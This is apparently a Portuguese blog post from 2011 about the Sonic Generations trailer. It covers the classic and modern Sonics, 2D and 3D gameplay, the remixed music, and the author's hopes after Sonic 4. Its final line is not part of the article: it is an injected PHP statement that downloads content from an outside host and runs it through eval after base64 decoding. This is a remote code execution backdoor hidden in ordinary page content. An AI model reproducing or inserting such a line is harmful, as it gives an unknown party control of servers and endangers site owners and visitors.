RSS Twitter

Agora vai? Trailer de Sonic Generations gera esperanca

Postado por André Reis em 19 abril 2011 | Games   

Ontem falei do ciclo que começa com cada anúncio de um jogo do Sonic, e hoje trago o primeiro trailer do jogo chamado Sonic Generations em comemoração aos 20 anos do personagem. Resumindo os principais detalhes do jogo, está sendo produzido pelo Sonic Team e será lançado ainda este ano para PS3 e X360, nada de Wii afinal o jogo está sendo produzido desde o início em HD (ao menos é a justificativa da SEGA).

Sonic Generations pretende homenagear o aniversário de 20 anos do personagem e por isto oferece dois Sonics, o “clássico” (mais gordinho e com olhos pretos) e o “moderno” (mais magro, atlético, e com olhos verdes, design predominante a partir do Dreamcast em diante). O Sonic clássico normalmente será usado em fases com jogabilidade em 2D, com apenas 2 comandos, pulo e dash, enquanto o Sonic moderno terá uma jogabilidade 3D (geralmente com a câmera atrás do personagem) e com um número maior de comandos (corre, pula, air-dashing, boost, air tricks, etc). Disseram que escutaram os fãs, e que as falhas presentes na animação / física do Sonic 4 foram corrigidas.

Sendo uma espécie de homenagem, elementos das 3 eras (de acordo com a SEGA 1) clássica, 2) dreamcast, 3) moderna) estarão presentes no jogo, seja através de inimigos, fases ou músicas. A trilha do jogo será composta por remixes das principais faixas da série. Vários outros personagens irão aparecer, mas somente iremos controlar os Sonics. Por fim, o level design será composto de fases clássicas do jogo, apresentando duas perspectivas diferentes (como vocês podem conferir nas imagens acima da Green Hill Zone, e também no trailer abaixo).

Denovo posso estar caminhando para uma nova decepção, mas gostei bastante do que vi no trailer. A jogabilidade em 2D, que é o que mais me interessa, parece BEM melhor que a do Sonic 4. Aliás, este Sonic Generations me faz questionar se algum dia veremos o Episode 2 do Sonic 4. Tomara que finalmente a Sega acerte a mão neste Sonic, é bem verdade que jogos do personagem para os portáteis são muito bons, assim como alguns dos jogos “modernos” (ex: Sonic Colors), porém nenhum deles levou de volta o Sonic ao topo do gênero plataforma. Uma coisa é certa, a SEGA pelo menos está tentando.

$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));